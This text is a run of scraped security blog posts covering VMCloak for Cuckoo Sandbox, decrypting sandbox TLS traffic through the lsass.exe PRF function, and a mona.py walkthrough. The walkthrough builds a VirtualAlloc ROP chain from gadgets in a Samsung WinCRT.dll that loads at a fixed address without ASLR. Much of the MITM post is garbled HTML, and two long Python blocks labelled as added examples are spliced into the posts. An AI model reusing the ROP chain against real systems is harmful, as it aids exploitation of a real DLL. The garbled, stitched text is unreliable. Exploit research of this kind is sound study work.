Fast-forward 15 to 20 minutes: Windows has now been installed in your VM, the VM has been shut down, and the VM has been removed from the VirtualBox interface. All that remains is a VirtualBox harddisk file (.vdi file) in ~/.vmcloak/image and an entry about this new VM in VMCloak's new sqlite3 database.

Moving forward it is time to install a couple of software packages in the VM. Using vmcloak-install we will now install all of the currently supported dependencies.
The first parameter represents the name of our VM, followed by all the dependencies that should be installed.

    vmcloak install seven0 adobe9 wic pillow dotnet40 java7

Now to install Office 2007, assuming you have a valid ISO and serial key, one can do so as follows. The ISO path and serial key have to be provided as options to the dependency.

    vmcloak install seven0 office2007 \
        office2007.isopath=/path/to/a.iso \
        office2007.serialkey=ABC-DEF

If required one can also easily make manual changes to VMCloak VMs now. By calling vmcloak-modify with the VM name as the only parameter it is possible to change everything to your liking, and simply by shutting the VM down, from within Windows, the changes are made persistent. If you are running VMCloak locally then the --vm-visible argument makes sense. For remote interaction with the VM you should enable VRDE support on the VM and connect to it (e.g., through rdesktop -KPz ip:3389).

Finally there is the vmcloak-snapshot command which makes a snapshot of your VM. There are a couple of options available for this command, but it is mostly providing the name of the VMCloak VM, the name of the resulting VM as it will be used by Cuckoo, and the static IP address to assign.

    vmcloak snapshot seven0 cuckoo1 192.168.56.101

It is important to understand that after creating a snapshot of a VMCloak VM, as one does by running the vmcloak-snapshot command on it, the VMCloak VM becomes immutable. That is, you will no longer be able to run vmcloak-install or vmcloak-modify on it. The reasoning behind this is to save on valuable resources.
Filling your harddisk is quite easy when you have twenty Windows 7 VMs which each take up to 10GB.

If one decides he or she would like to update a VMCloak VM that is of course still possible. For now the only way down that road is by cloning that particular VMCloak VM. In the following example we clone seven0 to seven0p1 (or, seven0 with one patch applied).

    vmcloak clone seven0 seven0p1

I hope to have shed some light on the latest release. Going at it one step at a time, life has just gotten slightly easier again.

Posted in Uncategorized

Transparent MITM with Cuckoo Sandbox
Posted on July 26, 2015 by jbremer
In a series of upcoming blogposts I will be sharing a fair amount of cool features that have been worked on over the past year in Cuckoo Sandbox. This first blogpost features Man in the Middle support for Cuckoo Sandbox.

(For those that are familiar with Cuckoo Sandbox and the general ideas behind MITM, please scroll down to the slightly more exciting stuff in the Transparent snooping of HTTPS traffic paragraph).

So, man in the middle?

As we are well aware, MITM is generally used to describe the process of snooping on otherwise encrypted information, in this case network traffic. In this blogpost we will dive into two different ways of doing MITM:

- Providing a CA Root Certificate to allow a MITM proxy to intercept traffic.
- Transparent dumping of TLS Master Secrets to decrypt TLS traffic.

Eh, Cuckoo Sandbox?

Before we continue onto the MITM stuff, first a reminder on Cuckoo Sandbox. As some of you will be familiar with, Cuckoo Sandbox (http://cuckoosandbox.org/) is an Open Source Automated Malware Analysis Sandbox. Analyses are performed by starting a VM (Virtual Machine) and running the potentially malicious sample, or URL as we will be exploring in this blogpost, inside the VM, then stopping the VM once the analysis is done.

Due to a personal interest, and that of some of my clients, Cuckoo has been getting much, much better at analyzing Internet Explorer and the like in the past few months.
Both in actually analyzing it, but also due to developmentsbr />outside of the actual analysis, as will be outlined in this blogpost.br />(For a part of the improvements on the analysis part I would like to thankbr />Brad Spengler for continuously providing feedback and bug fixes)./p>h1>At work with mitmproxy/h1>p>The first solution to provide MITM support to Cuckoo was to integrate a toolbr />called a hrefhttp://mitmproxy.org/>mitmproxy/a>, created by Aldo Cortesi and maintained by fellowbr />a hrefhttp://honeynet.org/>The Honeynet Project/a> member Maximilian Hils./p>p>As outlined by the documentation mitmproxy works bybr />a hrefhttp://mitmproxy.org/doc/certinstall.html>installing a CA Root Certificate/a> on the target device, in this case abr />VM running either Windows XP or Windows 7./p>p>After Googling around and looking at GUI dialogs to em>import/em> certificates intobr />the Windows Certificate store I finally managed to find anbr />a hrefhttps://github.com/cuckoobox/cuckoo/blob/85d15a81314e9953c58a8fa8102d069eb8aa8abb/analyzer/windows/modules/auxiliary/installcert.py#L35-L36>easy command-line way to import a certificate/a> (that only works onbr />Windows 7, not Windows XP). So basically invoking certutil.exe imports a .p12br />certificate, this certificate can be found in ~/.mitmproxy after runningbr />mitmproxy once (the first time mitmproxy is ran on a system it automaticallybr />creates a unique set of certificates)./p>p>At this point there are two ways to throttle traffic from the VM intobr />mitmproxy. 
For the time being I have a hrefhttps://github.com/cuckoobox/cuckoo/blob/130247f4f2260fe85fd463464c78f1504c34efe2/analyzer/windows/modules/packages/ie.py#L98-L115>taken the easy way/a>, whichbr />involves explicitly routing traffic through a socks4/5 proxy, but thisbr />approach has obvious disadvantages:/p>ul>li>This technique is em>not/em> compatible with a hrefhttps://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning>Certificate Pinning/a>./li>li>Looking at the PCAP file all traffic goes to the proxy./li>li>Having to explicitly tunnel traffic through socks4/5 translates into thisbr /> technique not working for anything but Internet Explorer (i.e., at thisbr /> point no support has been provided for other applications)./li>li>Hostnames are not resolved in the VM. Did I mention all the traffic goes tobr /> the proxy?/li>/ul>p>A better approach would be to route VM traffic to the proxy by the use of abr />tool such as a hrefhttp://darkk.net.ru/redsocks/>redsocks/a> (not to be confused with a hrefhttp://redsocks.nl/>RedSocks/a>, abr />Dutch startup and one of my clients, providing the malware threat defender, abr />network security appliance for detecting malware infections and other unwantedbr />software in your corporate network).br />Anyway, a possible drawback of such tool is the requirement of having tobr />configure it through various root commands, a requirement that generally isbr />not available to Cuckoo once it is running. 
I have to look into this later..br />(And also this technique still requires the CA Root Certificate and thus it isbr />not compatible with Certificate Pinning)./p>h1>Transparent snooping of HTTPS traffic/h1>p>Going a bit more in-depth with a hrefhttps://en.wikipedia.org/wiki/HTTPS>HTTPS/a> and a hrefhttps://en.wikipedia.org/wiki/Transport_Layer_Security>TLS/a> we learnbr />that in the a hrefhttp://www.moserware.com/2009/06/first-few-milliseconds-of-https.html>TLS protocol/a> the client and server exchange a per-sessionbr />em>random/em> which, a hrefhttp://security.stackexchange.com/questions/89383/why-does-the-ssl-tls-handshake-have-a-client-and-server-random/89655#89655>in combination with the master secret/a>, can bebr />used to derive the encryption keys, MAC keys, and IVs (when needed) which inbr />turn allow one to fully decrypt the TLS stream./p>p>Reading further we find a hrefhttp://reverseengineering.stackexchange.com/questions/2681/is-it-possible-to-decrypt-an-ssl-connection-short-of-bruteforcing/2695#2695>where and how to intercept the PRF function/a> bybr />Brendan Dolan-Gavitt, the a hrefhttps://github.com/moyix/panda>developer of PANDA/a>. We also find whichbr />information is required a hrefhttps://ask.wireshark.org/questions/4229/follow-ssl-stream-using-master-key-and-session-id>to decrypt TLS streams in Wireshark/a>./p>p>Time to take a step back. So we require the RSA Session ID, which, as definedbr />in the a hrefhttp://www.moserware.com/2009/06/first-few-milliseconds-of-https.html>TLS protocol/a>, can be extracted from the em>Server Hello/em> record.br />We also require the Master Secret, which, a hrefhttp://security.stackexchange.com/questions/89383/why-does-the-ssl-tls-handshake-have-a-client-and-server-random/89655#89655>as we have seen/a>, canbr />be extracted from the PRF function call. 
By instrumenting the PRF functionbr />call looking for calls which feature the “key expansion” string (as defined inbr />a hrefhttp://tools.ietf.org/html/rfc2246#page-21>RFC 2246/a>) we see that we can extract the master secret together withbr />the server random./p>p>Long story short. If we extract each pair of em>server random/em> and em>masterbr />secret/em> from the PRF function in lsass.exe (Brendan outlined that all TLSbr />encryption is performed by the lsass.exe service on Windows, Windows 7 atbr />least), and if we extract em>Server Hello/em> records from the PCAP file whichbr />links the em>Session IDs/em> to the em>server random/em>, thenbr />we can cross-reference this information to write the Master Secret file withbr />matching RSA Session ID and Master Secrets for each TLS session that wasbr />negotiated during the analysis in the VM. (Note that to cross-reference webr />extracted the server random in both scenarios, once from the Server Hellobr />record and once from the PRF “key expension” function call)./p>p>Fast forward various long nights debugging code, many changes and improvementsbr />to Cuckoo to be able to facilitate all of this in the first place, andbr />matching the various pieces of extracted information to each other, we finallybr />conclude with functionality in Cuckoo to dump a tlsmaster.txt file for eachbr />analysis./p>p>To recap some facts about this transparent approach:/p>ul>li>It does not require any special handling for the instrumented application,br /> just to the instrumented lsass.exe service./li>li>Cuckoo can decrypt any TLS/HTTPS stream that uses the Windows API to performbr /> the TLS/HTTPS encryption. 
Including those of Windows Update, etc./li>li>Since there is no need to proxy the traffic through some 3rd party tool, thebr /> PCAP file looks the same as it would without our transparent sniffer./li>li>As nothing happens with the TLS itself, applications that use Certificatebr /> Pinning are supported./li>/ul>p>Following a screenshot showing Wireshark with a PCAP containing decryptedbr />HTTPS traffic of an analysis going to the login page of the Dutch bankingbr />website ING using the latest Cuckoo Sandbox:/p>p>img altWireshark vs ING src/wp-posts/ing.png />/p>h1>HTTP/HTTPS replay tool/h1>p>Because I was not really able to find such code elsewhere, and because tsharkbr />falls under the em>not invented here/em> rule, I worked up a small Python projectbr />that a hrefhttps://github.com/jbremer/httpreplay>extracts HTTP and HTTPS streams/a> from a PCAP file withbr />according TLS Master Secrets file. To be fair, integrating a tool such asbr />tshark with a tool such as Cuckoo Sandbox is suboptimal, as naturally one ofbr />the future goals is to include decrypted https traffic in the Cuckoo reportsbr />without having to depend on tools like mitmproxy (due to the non-transparencybr />thing)./p>p>The final goal of em>httpreplay/em> will, as one might expect, be to transparentlybr />replay HTTP/HTTPS traffic from a PCAP file. At the moment this last step hasbr />not been implemented yet, though. 
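The cross-referencing step described above, as an added example (this is not Cuckoo's or httpreplay's code): it parses Server Hello records into a session ID to server random map, joins them on the server random with (server random, master secret) pairs of the kind the lsass.exe PRF hook yields, and writes lines in the "RSA Session-ID ... Master-Key" format Wireshark reads. The records and PRF pairs are constructed inline; the record layout follows RFC 2246/5246, and the record list stands in for what would be pulled from the PCAP.

```python
"""Cross-reference TLS Server Hello records with PRF-dumped secrets.

Added example, not code from Cuckoo or httpreplay. Every input below is
constructed in this file; a real run would take records from the PCAP and
the (server_random, master_secret) pairs from the lsass.exe PRF hook.
"""
import struct

HANDSHAKE = 22        # TLS ContentType handshake
SERVER_HELLO = 2      # HandshakeType server_hello


def parse_server_hello(record):
    """Return (session_id, server_random) if `record` is one TLS record that
    starts with a Server Hello, else None. Only the first handshake message
    in the record is inspected; a truncated record yields None."""
    if len(record) < 5 or record[0] != HANDSHAKE:
        return None
    (rec_len,) = struct.unpack("!H", record[3:5])
    body = record[5:5 + rec_len]
    if len(body) < 4 or body[0] != SERVER_HELLO:
        return None
    hs_len = int.from_bytes(body[1:4], "big")
    hs = body[4:4 + hs_len]
    # ServerHello: version(2) random(32) session_id_len(1) session_id(...)
    if len(hs) < 35:
        return None
    server_random = hs[2:34]
    sid_len = hs[34]
    session_id = hs[35:35 + sid_len]
    if len(session_id) != sid_len:
        return None
    return session_id, server_random


def build_master_secret_lines(records, prf_pairs):
    """Join Server Hellos (session id <-> server random) with PRF output
    (server random <-> master secret) on the shared server random and
    return the lines of a Wireshark-style master secret file."""
    sid_by_random = {}
    for rec in records:
        parsed = parse_server_hello(rec)
        if parsed is None:
            continue
        session_id, server_random = parsed
        if session_id:           # an empty id cannot be referenced later
            sid_by_random[server_random] = session_id
    lines = []
    for server_random, master_secret in prf_pairs:
        session_id = sid_by_random.get(server_random)
        if session_id is None:   # PRF call without a captured Server Hello
            continue
        lines.append("RSA Session-ID:%s Master-Key:%s"
                     % (session_id.hex(), master_secret.hex()))
    return lines


def make_server_hello(server_random, session_id, version=b"\x03\x03"):
    """Build one TLS record carrying a minimal Server Hello (constructed
    test input; the cipher suite and compression bytes are arbitrary)."""
    hs_body = version + server_random + bytes([len(session_id)]) + session_id
    hs_body += b"\x00\x2f" + b"\x00"
    handshake = bytes([SERVER_HELLO]) + len(hs_body).to_bytes(3, "big") + hs_body
    return bytes([HANDSHAKE]) + version + struct.pack("!H", len(handshake)) + handshake


# Constructed sample data standing in for the PCAP and the PRF dump.
RANDOM_A = bytes(range(32))
SID_A = bytes([0xAA]) * 32
MASTER_A = bytes([0x11]) * 48
RANDOM_B = bytes([0x55]) * 32   # PRF call whose Server Hello was not captured
MASTER_B = bytes([0x22]) * 48
RECORDS = [
    b"\x17\x03\x03\x00\x01\x00",     # application data record, ignored
    make_server_hello(RANDOM_A, SID_A),
]
PRF_PAIRS = [(RANDOM_A, MASTER_A), (RANDOM_B, MASTER_B)]


def tlsmaster_txt():
    """The tlsmaster.txt content for the sample above."""
    return "\n".join(build_master_secret_lines(RECORDS, PRF_PAIRS))


if __name__ == "__main__":
    print(tlsmaster_txt())
```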
Aside from other goals, this can be used to reproduce and unittest analysis of certain websites with Cuckoo Sandbox, etc, etc.

Quickly running the httpreplay tool on the same PCAP as shown earlier we find the following output (just URLs of extracted HTTP/HTTPS streams):

```bash
$ python httpreplay.py dump.pcap tlsmaster.txt
http://mijn.ing.nl/
https://mijn.ing.nl/internetbankieren/
https://mijn.ing.nl/favicon.ico
...
```

Some readers may note this tool is very similar to a thousand others in its field, one of which being [CapTipper](https://github.com/omriher/CapTipper), developed by our friends at CheckPoint. At the moment the only added value of *httpreplay* would be HTTPS support (and perhaps proper TCP reassembly and the future goal of being able to operate on multi-gigabyte files: in-memory loading and all that).

## Conclusion

Knowledge about TLS was gained. Tools were reinvented. Cuckoo Sandbox gained some new tricks. I finally wrote another blogpost ;)

# VMCloak 0.2: Windows 7 Support

Posted on March 18, 2015 by jbremer (https://jbremer.org/vmcloak2/)

A couple of months ago I [released](http://jbremer.org/vmcloak) the first version of [VMCloak](https://github.com/jbremer/vmcloak), now it's time for version *0.2*.
VMCloak is a tool for automatically creating and configuring *Virtual Machines* for [Cuckoo Sandbox](http://cuckoosandbox.org/).

## What's new?

In this version of VMCloak we introduce the long-awaited **Windows 7** support. This means VMCloak can now automatically create and configure Windows 7 virtual machines for Cuckoo Sandbox.

## Usage

Those who have used VMCloak in the past will see that creating Windows 7 virtual machines is now just as easy as creating Windows XP virtual machines. Creating a Windows 7 virtual machine goes as follows:

```bash
# Install the latest vmcloak.
sudo pip install vmcloak --upgrade

# Mount the Windows 7 Installer ISO.
sudo mkdir -p /mnt/win7
sudo mount -o loop,ro win7.iso /mnt/win7

# Ensure the VirtualBox hostonly adapter is up.
vmcloak-vboxnet0

# Create a Win7 VM with the name win7vm.
# This will take about 15 to 20 minutes.
vmcloak -r --win7x64 win7vm
```

Besides a couple of internal changes, the only thing that changed for Windows XP support is that you'll now have to specify **--winxp** when creating a Windows XP virtual machine, for example:

```bash
vmcloak -r --winxp winxp0 --serial-key AAAAA..EEEEE
```

## 32-bit vs 64-bit

With Windows 7 in mind, it makes sense that VMCloak now supports both 32-bit and 64-bit Windows 7 installations. This mostly means that VMCloak will install a 64-bit version of the .NET framework, the 64-bit version of the Microsoft C Runtime, etc. For this to work, however, you'll have to inform VMCloak that the 64-bit libraries should be used instead of the 32-bit ones. This can either be achieved by passing the **--x64** flag to vmcloak, or by combining the **--win7** and **--x64** flags straight into the **--win7x64** flag.

(The upcoming version of Cuckoo Sandbox, version 1.3, will support **64-bit analysis**!)

## VMCloak Birds

Those who want to deploy multiple virtual machines in a relatively short time window while preserving as many resources as possible might like VMCloak's **bird** feature. VirtualBox has *immutable* disks, disks that are created once and then never changed; any changes on top of the immutable disk are then written to a new VirtualBox disk. VMCloak uses this to create a *bird image*: a fully installed and configured Windows installation. Creating a Virtual Machine ready to be used by Cuckoo Sandbox out of this bird image then consists of a couple of steps:

- Create a new Virtual Machine.
- Attach the immutable bird image.
- Boot into Windows.
- Configure a unique static IP address for this VM.
- Run Cuckoo and take a snapshot of the VM.

Naturally all these steps are handled by **vmcloak-clone**.

Bird images are **crucial** when running a Cuckoo Sandbox instance with more than a handful of VMs on one machine. Whereas creating a new VM with Windows 7 installed, such as a bird image, takes about 15 minutes of time and almost 10GB of disk space, creating a clone of a bird image takes less than a minute and less than 1GB per clone. *Note that you'll still need the bird image, also after cloning!* (Basically, instead of installing Windows 7 10 times for 10 VMs, the bird image allows you to install Windows 7 once and then re-use this installation).

Following is a quick guide to setting up 10 VMs using a VMCloak bird. Running these commands should take up to half an hour to finish, just enough to go for lunch.

```bash
# Create the 64-bit Windows 7 Bird.
vmcloak -r --win7x64 --bird win7bird

# Create 10 VMs.
for i in {0..9}; do
    vmcloak-clone -r --bird win7bird win7_$i
done
```

## What's next?

As always, further cloaking the VMs is on the roadmap. If anyone has tricks & tips on known detection vectors that would be useful for VMCloak, please do let me know. E.g., registry keys containing known values specific to virtualization software, etc.

Other than that, I've been working hard on 64-bit analysis for Cuckoo Sandbox for a while now, so there's that ;) And a bunch of other new and upcoming features in Cuckoo.

## Contact

For any questions or suggestions, please feel free to [reach out to me](mailto:jurriaanbremer_at_gmail_dot_com).

# VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox
Posted on September 22, 2014 by jbremer (https://jbremer.org/vmcloak/)

Today I present you a tool that I've been working on for a while, [vmcloak](http://vmcloak.org/). For those of you familiar with [Cuckoo Sandbox](http://cuckoosandbox.org/) and setting it up, you'll surely be aware of the pain that is **configuring virtual machines**.

## VMCloak 101

Somewhat complete documentation can be found at [readthedocs.org](http://vmcloak.readthedocs.org/en/latest/), however, a quick introduction of the related commands is of course the easiest. (**Do note that VMCloak has mostly been tested on Ubuntu/Debian, so other distributions might not work, yet.**)

Basically you need a few things to get started:

- vmcloak (**sudo pip install vmcloak**)
- Windows XP Installer ISO file
- Windows XP Serial Key (that works with your installer!)
- genisoimage & VirtualBox (**sudo apt-get install genisoimage virtualbox**)
- Two directories for VirtualBox files.

First we have to [mount the Windows installer ISO file](http://vmcloak.readthedocs.org/en/latest/config.html#conf-mounted-iso):

```bash
sudo mkdir -p /mnt/winxp
sudo mount -o loop,ro /path/to/your/winxp.iso /mnt/winxp
```

Now we have to [start vboxnet0 if it has not already been started](http://vmcloak.readthedocs.org/en/latest/vbox.html):

```bash
# If this returns nothing, then vboxnet0 hasn't
# been started.
VBoxManage list hostonlyifs

# Create vboxnet0 and assign the correct IP address.
VBoxManage hostonlyif create
VBoxManage hostonlyif ipconfig vboxnet0 --ip 192.168.56.1
```

And then two directories are required: a directory where VirtualBox's snapshot files will be stored, and a directory where the VirtualBox hard disk files and installer ISO files will be stored. Note that you might want to place the snapshot files in a *tmpfs* container to ensure VMs load pretty much instantly.

```bash
mkdir ~/vms/ ~/vm-data/
```

Having set up the mount directory, the hostonly interface, and the VirtualBox directories, we're now good to go with regards to creating our first VM with VMCloak. It is recommended to use the **recommended settings** by providing the **-r** switch. By default the hostonly IP address will be set to 192.168.56.101, however, if you intend to create multiple VMs then you'll have to give each VM a unique IP address (i.e., 192.168.56.102, 192.168.56.103, etc.) In order to automatically register the newly created VM with Cuckoo you'll have to set the **cuckoo directory**, so we'll do this as well.

We're now going to make a VM with the name **cuckoo1** and the IP address **192.168.56.101**:

```bash
vmcloak -r -d --vm-dir ~/vms/ --data-dir ~/vm-data/ \
    --iso-mount /mnt/winxp --serial-key AAAAA...EEEEE \
    --hostonly-ip 192.168.56.101 --cuckoo ~/cuckoo/ \
    cuckoo1
```

The **-d** switch causes vmcloak to spit out debugging messages which may be helpful in some cases. This command will take **up to 30 minutes** to finish; on the machines I've tested it's usually less than or roughly 10 minutes.

So.. get yourself something to drink, wait for a bit, and you should have a VM ready to be used by Cuckoo.

## Allowing VMs full internet access

It is possible to [give VMs full internet access](http://vmcloak.readthedocs.org/en/latest/network.html), even **after** creating them, without modifying the VMs themselves. If your network configuration is "regular" (i.e., a working internet connection at either **eth0** or **wlan0**) then you'll only have to run one command:

```bash
sudo vmcloak-iptables
```

## TODO

Of course this is a never-ending project and it's still actively being developed ;) Things on the TODO list include, but are not limited to:

- Windows 7 support
- Further VM cloaking (making the VM as stealthy as possible)
- VMWare Workstation support
- Support for installing Adobe / Microsoft Office / etc in the VM
- Loads more..

## Source

Of course there's an [official website](http://vmcloak.org/) and naturally the source code can be found on [github](https://github.com/jbremer/vmcloak).

## Credits

Further credits go to Thorsten Sick of [Avira](http://avira.com/) and a special thanks to [Avira](http://avira.com/) and the [iTES Project](http://www.ites-project.org/index_en.html) for supporting the development of this tool.

So much for today! Hope the tool will be useful for people and if there are any questions don't hesitate to email me or so.

ps: Please don't tell me about using **vagrant** or similar instead of something custom built unless you've actually used it together with Cuckoo :P

# Mona 101: a Global Samsung DLL

Posted on December 8, 2013 by jbremer (https://jbremer.org/mona-101-a-global-samsung-dll/)

This
blogpost will be just another 101 for [mona.py](http://redmine.corelan.be/projects/mona). There's already a good introduction to / full documentation of mona [here](https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/), including setting it up and running it for the first time. (Which is surprisingly easy, at least with Immunity Debugger; I haven't tested mona with WinDBG.)

## Our target

Well, it turns out that a dll called **WinCRT.dll**, developed by Samsung and distributed by default on at least a set of Samsung laptops, is being loaded in every process that imports **user32.dll** on my system.. Yay! Needless to say it doesn't have *ASLR* enabled, nor does it rebase by default. If you haven't guessed its base address by now, then I'll give you a hint; 0x10000000. A copy of the DLL can be found [here](/wp-posts/samsung-wincrt.dll); naturally I'm not responsible for whatever you do with it :p

Btw, the path of this Samsung DLL is: **C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll**

## Generate some ROP

After running any program which imports user32, such as the following MessageBox() program, we attach Immunity Debugger to it.

```cpp
#include <windows.h>

int main()
{
    MessageBoxA(NULL, "Hello Samsung!", ":-)", 0);
}
```

We run the following command and get our ROP chain after roughly 10 seconds:

```bash
!mona rop -m wincrt -rva
```

As documented in the tutorials that were linked earlier in this blogpost, the **-m** switch specifies the module to search, and **-rva** gives a dump with addresses relative to the base address. (In case you need an infoleak to obtain the base address of your target module, rather than having a DLL that's being loaded at a static address.)

The ROP chain returned may look like the following, including some comments about what the registers should look like at the point that *VirtualAlloc* is invoked.

```python
import struct

"""
Register setup for VirtualAlloc() :
 EAX = NOP (0x90909090)
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualAlloc()
 EDI = ROP NOP (RETN)
"""

def create_rop_chain(base_wincrt):
    # rop chain generated with mona.py
    rop_gadgets = [
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN    WinCRT.dll
        base_wincrt + 0x0001f0a8,  # ptr to &VirtualAlloc() [IAT WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x00005bff,  # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN 0x08    WinCRT.dll
        base_wincrt + 0x0000431d,  # PUSH EAX # ADD AL,5F # POP ESI # RETN    WinCRT.dll
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        base_wincrt + 0x0001a14e,  # POP EBP # RETN    WinCRT.dll
        0x00000000,                # &
        base_wincrt + 0x0000bd5b,  # POP EBX # RETN    WinCRT.dll
        0x00000001,                # 0x00000001-> ebx
        base_wincrt + 0x00005209,  # POP EBX # RETN    WinCRT.dll
        0x00001000,                # 0x00001000-> edx
        base_wincrt + 0x0001183c,  # XOR EDX,EDX # RETN    WinCRT.dll
        base_wincrt + 0x0001175e,  # ADD EDX,EBX # POP EBX # RETN 0x10    WinCRT.dll
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x000191b8,  # POP ECX # RETN    WinCRT.dll
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x00000040,                # 0x00000040-> ecx
        base_wincrt + 0x0000f203,  # POP EDI # RETN    WinCRT.dll
        base_wincrt + 0x0000f204,  # RETN (ROP NOP)    WinCRT.dll
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN    WinCRT.dll
        0x90909090,                # nop
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x0000c27e,  # PUSHAD # ADD AL,0 # RETN    WinCRT.dll
    ]
    return "".join(struct.pack("<I", _) for _ in rop_gadgets)

# WinCRT.dll ASLR: False, Rebase: False, SafeSEH: True, OS: False, v0.0.0.1 (C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll)
base_wincrt = 0x10000000
rop_chain = create_rop_chain(base_wincrt)
```

## Fixing the ROP chain

Unfortunately mona makes some small mistakes, but that's why it gives great feedback in the form of [*rop.txt*](/wp-posts/samsung-rop.txt) and [*rop_suggestions.txt*](/wp-posts/samsung-rop_suggestions.txt).

Now if you look closely at the generated ROP chain, while comparing it to the notes about the required states of the registers for VirtualAlloc, then you'll notice that some gadgets have to be shuffled around, and some are not correct yet.

Let's analyze each register top-to-bottom from the provided register list in order to see if they're all set correctly. First we start with *eax*.

Eax is set to 0x90909090 at the end. However, that gadget also sets *ebp* to an invalid value; register dependencies are something that mona doesn't handle very well yet, unfortunately. Anyway, it's easier to replace this gadget than to shuffle it around. I ended up replacing it by a "pop ecx ; retn" and "mov eax, ecx ; retn" gadget, and moving it to an earlier place in the ROP chain where ecx has not yet been assigned its final value. Ecx itself is already correct, it'll be set to 0x40 using the 'original' "pop ecx ; retn" gadget.

Edx has to become 0x1000, for which mona has decided to use *ebx* as intermediate register. We can remove the first gadget that sets ebx, as its value is overwritten right away when executing the next gadget. (Which sets ebx as well.)

Now mona handles *esp* for us, so we don't have to do anything there.
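The properties mona summarises in that trailing comment (ASLR: False, Rebase: False) are readable straight from the PE headers, which is the check a defender runs over third-party DLLs that get injected into every process. The following is an added example, not code from the post or from mona.py: it parses the COFF and optional headers for DYNAMIC_BASE, NX_COMPAT and a usable relocation table, and the sample image at the bottom is constructed here to mimic only the flags reported for WinCRT.dll, not the DLL itself.

```python
"""Report the load-time mitigations a DLL opts into, from its PE headers.

Added example, not part of the post or of mona.py. Offsets follow the PE
format specification; the sample images are constructed below.
"""
import struct

IMAGE_FILE_RELOCS_STRIPPED = 0x0001            # COFF Characteristics
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400
PE32, PE32PLUS = 0x10B, 0x20B
DIR_BASERELOC = 5                              # data directory index


def pe_mitigations(data):
    """Parse a PE image and return a dict of the mitigation-relevant fields."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (coff_chars,) = struct.unpack_from("<H", data, coff + 18)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == PE32:
        (image_base,) = struct.unpack_from("<I", data, opt + 28)
        dirs = opt + 96
    elif magic == PE32PLUS:
        (image_base,) = struct.unpack_from("<Q", data, opt + 24)
        dirs = opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)  # same in both formats
    reloc_rva, reloc_size = struct.unpack_from("<II", data, dirs + 8 * DIR_BASERELOC)
    return {
        "image_base": image_base,
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "nx": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NO_SEH),
        # The loader can only move the image if relocations exist and were kept.
        "rebase": reloc_size != 0 and not (coff_chars & IMAGE_FILE_RELOCS_STRIPPED),
    }


def findings(info):
    """Turn the parsed fields into the warnings a reviewer would raise."""
    out = []
    if not info["aslr"]:
        out.append("DYNAMIC_BASE not set: image is not randomized by ASLR")
    if not info["rebase"]:
        out.append("no usable relocations: loader cannot move it from 0x%x"
                   % info["image_base"])
    if not info["nx"]:
        out.append("NX_COMPAT not set")
    return out


def make_pe32(image_base, dll_chars, coff_chars=0, reloc_size=0):
    """Constructed minimal PE32 image with no sections (headers only)."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64)        # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, coff_chars)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32)
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * DIR_BASERELOC,
                     0x1000 if reloc_size else 0, reloc_size)
    return dos + b"PE\x00\x00" + coff + bytes(opt)


# Mimics the flags mona reported for WinCRT.dll: no ASLR, not rebasable, fixed base.
SAMPLE_NO_ASLR = make_pe32(0x10000000, 0, coff_chars=IMAGE_FILE_RELOCS_STRIPPED)
# A DLL linked with /DYNAMICBASE /NXCOMPAT that kept its relocation table.
SAMPLE_HARDENED = make_pe32(0x10000000, 0x0140, reloc_size=0x200)


if __name__ == "__main__":
    for name, img in (("no-aslr", SAMPLE_NO_ASLR), ("hardened", SAMPLE_HARDENED)):
        print(name, pe_mitigations(img), findings(pe_mitigations(img)))
```

For a real file, pass `open(path, "rb").read()` to `pe_mitigations`; only the headers are read, so the size of the DLL does not matter.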
The next register, *ebp*, however, does need some extra work. The description tells us it needs to point to a "jmp esp" gadget, but because there's no such gadget in our DLL mona sort of failed silently. (The comment doesn't show an error message, but instead shows something that doesn't make much sense.)

Given there's no "jmp esp" in our code, nor a direct "push esp ; retn" gadget, we have to play around with mona some more.. We run the following command which is, again, documented [here](https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/), and find the following gadget.

```bash
!mona findwild -s "push esp#*#retn" -m wincrt
0x10009558: push esp # add al,2 # adc bl,al # xor eax,eax # retn    WinCRT.dll
```

## Finishing up

